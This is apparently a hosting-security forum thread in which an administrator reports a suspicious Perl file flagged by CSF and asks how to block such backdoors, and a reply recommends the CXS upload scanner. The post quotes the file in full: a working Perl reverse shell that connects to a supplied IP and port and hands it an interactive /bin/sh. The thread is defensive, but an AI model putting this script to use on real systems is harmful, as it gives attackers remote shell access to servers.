Block certain suspicious files

Post Reply
saurabhnsonar
Junior Member
Posts: 2
Joined: 11 Sep 2011, 13:54

Block certain suspicious files

Post by saurabhnsonar »

I have got alert form csf regarding suspicious file bc. pl on the server with the following content.

#!/usr/bin/perl
use Socket;
$iaddr=inet_aton($ARGV[0]) || die("Error: $!\n");
$paddr=sockaddr_in($ARGV[1], $iaddr) || die("Error: $!\n");
$proto=getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
system('/bin/sh -i');
close(STDIN);
close(STDOUT);
close(STDERR);

This gives direct access to shell of the server. Can someone suggest me how can I stop such kind of backdoor connect script to work rather that checking a alert and manually deleting every time after I get just alert?
Please help with some suggestions to block such kind of hacking attacks.

Thank you!
Sergio
Junior Member
Posts: 1712
Joined: 12 Dec 2006, 14:56

Re: Block certain suspicious files

Post by Sergio »

Using CXS is the best way of blocking this. CXS checks every file uploaded to the server and deletes the file on the fly.

Sergio
Post Reply